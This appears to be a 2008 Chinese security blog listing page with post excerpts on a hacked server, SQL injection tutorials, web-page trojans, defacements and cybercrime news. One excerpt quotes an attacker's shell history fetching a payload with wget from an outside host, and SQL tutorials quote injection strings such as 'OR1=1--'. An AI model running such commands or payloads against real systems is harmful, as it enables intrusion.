LivePUB (江苏) 放个主机到外网，放了两天被黑两次

发表于 2008-12-12 评论: 6

第一次查到来源IP说是广西的，第二次是美国。 第一次把系统弄的彻底起不来，第二次把所有用户密码都改掉了... 幸好，还有一个会话从昨晚持续到现在，是root登录的，history查看到他们的动作： 576  wget nasuc.d.am/scan/neW.jpg   577  wget nasuc.do.am/scan/neW.jpg  ... ...全文

hnkdrory (广东) CC DDOS攻击器的原理及防范方法

发表于 2008-12-07 评论: 2

适合读者：DDOS研究员、各大站长、网络管理员　　前置知识：ASP基本阅读能力　　蝴蝶：前段时间上海一家游戏娱乐公司的网站遭到了基于页面请求的DDOS分布式拒绝服务攻击，网站陷入完全瘫痪状态，并被黑客的匿名信勒索，金额高达10万元，而在勒索过程中，这群黑客还表示会对腾讯QQ等网站下手，随后QQ“服务器维护”几天。... ...全文

天使不好 (北京) SQL注入葵花宝典

发表于 2008-10-18

 说明:本文分基础篇和高级篇基础篇重在一些基本的概念和步骤高级篇重在于一些技巧许多刚入门的小菜们可能会经常听到SQL注入这个词汇，但更多人的可能对SQL并不怎么了解，只是感觉是一种很神秘的黑客入侵手段，所以我就想系统的介绍和总结一下帮你揭开它的神秘面纱在写本文之前，我参阅了一些相关资料，下面就让我们... ...全文

标签: sql SQL 宝典

mssp299 (福建) SQL注入原理深度解析(2)

发表于 2008-09-17

四、构造SQL注射代码 为了成功地注入SQL命令，攻击者必须将开发人员的现有SQL命令转换成一个合法的SQL语句，当然，要盲注是有些难度的，但一般都是这样： 'OR1=1– 或者 ')OR1=1-- 此外，许多Web应用提供了带来错误报告和调试信息，例如，利用'OR1=1--对Web应用进行盲注时，经常看到如下所示的错误信息： Er... ...全文

标签: sql SQL 解析 深度 原理

mssp299 (福建) SQL注入原理深度解析(1)

发表于 2008-09-17 评论: 2

对于Web应用来说，注射式攻击由来已久，攻击方式也五花八门，常见的攻击方式有SQL注射、命令注射以及新近才出现的XPath注射等等。本文将以SQL注射为例，在源码级对其攻击原理进行深入的讲解。 一、注射式攻击的原理 注射式攻击的根源在于，程序命令和用户数据（即用户输入）之间没有做到泾渭分明。这使得攻击者有机会将... ...全文

标签: sql SQL 解析 深度 原理

qqmuma 网页木马的再发挥

发表于 2008-08-30

 大家对木马都不陌生了，它可能要算是计算机病毒史上最厉害的了，相信会使木马的人千千万万，但是有很多人苦于怎么把木马发给对方，现在随着计算机的普及，在网络上我相信很少有人会再轻易的接收对方的文件了，所以网页木马诞生了。 1.它应该算是html带动同路径下的一个exe的文件的主页了，也就是当浏览器浏览这个页... ...全文

标签: 木马 网页 发挥

钯博 (北京) 清华网站被黑 黑客批评现行教育制度

发表于 2008-08-25 评论: 7

清华大学网站被黑，黑客宣称现行的大学教育制度就是“在往学生们的脑子里灌屎”。黑客捏造了一篇清华大学校长顾秉林接受采访的新闻报道，批评现行教育制度：    顾秉林校长表示，在二十世纪初至40年代，可以说是中国教育界的黄金时期，在这段时间以内中国的大学为社会培养出了大批的优秀人才，他们中有伟大的思... ...全文

dragonfisher (山东) 效率超高 iPhone OS 2.0刚发布即遭破解(图)

发表于 2008-07-12 评论: 1

　　在iPhone 2.0软件发布之前，许多“疯友”就开始考虑一个问题：iPhone 2.0被破解需要多长时间?是一天?还是一周?或一个月?其实都不是，事实证明只需几个小时。 　　新的iPhone OS 2.0软件在发布后几个小时后，就已经惨遭被解锁的，命运，它已经被著名的iPhone Dev Team所破解。 　　或许你会奇怪，是黑客效率高还是... ...全文

标签: iphone 破解 效率 iPhone

dragonfisher (山东) 紧急升级！黑客借DNS漏洞控制网络

发表于 2008-07-09 评论: 2

　　据国外媒体报道，最近计算机行业的重量级人物正在加紧修复一个互联网底层的漏洞，该漏洞可以被黑客利用来控制互联网的流量。 　　主要软件商和硬件商已经悄悄在一起工作了几个月来修复这个问题，本周二它们终于为此发布了一个软件补丁。 　　Securosis的分析师Rich Mogul在一次媒体见面会上表示，“这是一个非常严... ...全文

标签: dns 黑客 漏洞 网络 DNS

钯博 (北京) 黑客袭卫星 通过其传输的数据已不安全（转）

发表于 2008-07-08 评论: 6

卫星并非什么新鲜事物：自1957年前苏联发射“人造地球卫星1号”(Sputnik 1)后，卫星就开始在地球轨道上运行，已有近半个世纪的历史。第一颗商业地球同步卫星于1965年发射升空，这种卫星与地球同步转动，相对静止于地球相同位置的上空，用于传输电话、电视和无线电信号，使人们能更好地相互保持联系。 但它们也并非无懈... ...全文

标签: 传输 黑客 数据 卫星

dragonfisher (山东) PIN码丢失 花旗银行客户被窃数百万美元

发表于 2008-07-07 评论: 1

　　据国外媒体报道，近日三名美国人被指控在发现了窃取花旗银行客户的Pin码后，从这些客户那儿窃取了数百万美元。 　　该黑客团伙在今年3月份被美国联邦调查局逮捕，他们入侵了一家自动提款机(ATM)处理公司，并收集了在7-Eleven连锁店使用的银行卡的Pin码。 　　这些自动提款机带有花旗银行的标志，但却是由7-Eleven连... ...全文

标签: PIN 被窃 花旗银行 客户

dragonfisher (山东) 四成web浏览器对黑客不设防

发表于 2008-07-03

　　你上网的时候使用的Web浏览器安全吗?近日来自Google、IBM和瑞士的Communications Systems Group的专家发布了一项调查报告，报告显示目前只有60%的Web用户在使用升级了安全补丁的浏览器。 　　据这些安全专家估计，在全球14亿互联网用户中只有5亿多用户使用了最安全的浏览器。这一数据来自2007年1月到今年上个月的Go... ...全文

钯博 (北京) 黑客挑衅立陶宛集会法修正案

发表于 2008-07-02 评论: 1

    环球时报报道 据立陶宛国家通讯管理署信息与网络保护处负责人里季斯•赖尼斯透露，不明黑客在28日和29日攻击了立陶宛的几个网站，他们将这些网页涂成红色底页，画上了镰刀与锤子的图案。 　　立陶宛议会在上周宣布禁止在集会、请愿、游行示威其他公众活动时使用纳粹和苏联标志。这项修正案被写... ...全文

标签: 黑客 立陶宛

dragonfisher (山东) 域名管理机构自身域名被黑客劫持

发表于 2008-07-01

　　据安全专家上周六表示，来自土耳其的黑客成功攻击了互联网领域两家重量级监管机构的官方站点。 　　一家自称为“NetDevilz”的黑客组织声称对这次攻击事件负责，它们在周四早晨客成功黑掉了互联网域名管理机构ICANN和互联网网络号分配机构IANA，把访问者重定向到其它网站上。 　　据来自站点攻击证据手机的组织zon... ...全文

cmiunl (北京) 出国留学遇高峰时期，美国留学购

发表于 2008-06-18

出国留学遇高峰时期，美国留学购 出国留学遇高峰时期，留学购汇三大技巧 美国留学据中国银行个人金融部专家介绍，近年来，国家外汇管理局逐步放宽了对境内个人购汇的限制，境内个人年度购汇总额已大幅提高到5万美元，购汇手英国留学续也简化了。 技巧一：各银行换汇牌价不同，购汇可“货比三家”。 　　同一家银行在不同... ...全文

钯博 (北京) 转：分析Flash网马传播链 警惕网络安全

发表于 2008-06-18

    昨天处理了一起上财经论坛中木马的实例，这是个典型的利用flash player漏洞传播的木马，某人浏览财经类论坛中招，然后木马迅速在局域网内通过ARP攻击传播。 　　这个传播链大致是这样的： 　　1.专业盗号团队制作Flash网马 　　2.黑客入侵中小企业网站，或收购流量(指购买流量大的网站，在某一时... ...全文

标签: flash 木马

钯博 (北京) 公开进行网络敲诈 被判4年监禁

发表于 2008-06-16 评论: 2

　　刘某参与境外赌博亏损，就想敲诈境外博彩公司。遭拒后，刘某竟对博彩公司网站进行病毒攻击，造成对方经济损失。近日，鼓楼法院经审理，以敲诈勒索罪(未遂)判处刘某有期徒刑4年。 　　刘某原是福建某网络科技有限公司法人代表。他曾利用自己开设于深圳市罗湖区的服务器，长期参与境外赌博网站的网络赌博。亏损后，他... ...全文

标签: 犯罪 黑客 敲诈

糊涂李 (北京) 黑客攻破地震局网站后散布9级地震谣言被抓获

发表于 2008-06-12 评论: 4

　　苏州黑客攻击广西地震局网站，散布9级地震谣言。近日，广西警方在江苏警方的协助下，在江苏太仓将犯罪嫌疑人陈智峰抓获。 　　5月31日，正是全国齐心抗震救灾的时候，广西壮族自治区地震局主办的 “广西防震减灾网”突然出现了一条令人震惊的消息。在该网站首页“为您服务”栏目上，出现了一个题为《专家预测广西有... ...全文

标签: 黑客 地震

grjboy30 (辽宁) 一条命令扫描局域网内所有的IP及MAC

发表于 2008-05-23 评论: 422

一条命令扫描局域网内所有的IP及MAC,会的朋友就不用看了......具体操作方法：1、下载nbtscan.rar到硬盘后解压；2、然后将cygwin1.dll和nbtscan.exe两文件拷贝到c:\windows\system32下；3、进入cmd窗口就可以输入命令：nbtscan 192.168.1.1/24（假设本机的IP为:192.168.1.X）。20080516_930684719bd4356954bbQvEYnRoJPu1n... ...全文

dragonfisher (山东) 恐怖！黑客可利用网络攻击人类大脑

发表于 2008-05-16 评论: 4

　　近日美国科学家进行了首次模拟电脑黑客攻击人类大脑的实验。实验不仅引起了FBI的注意，并且一些特殊的电脑网络案件也使网络安全专家担心万分。 　　据报道，在过去的一个月里，多位患有癫痫病的网友向警方报案称，他们在浏览一些网站的时候，发觉出现意识不清的现象，甚至有被人控制的感觉。FBI在经过调查后发现，一... ...全文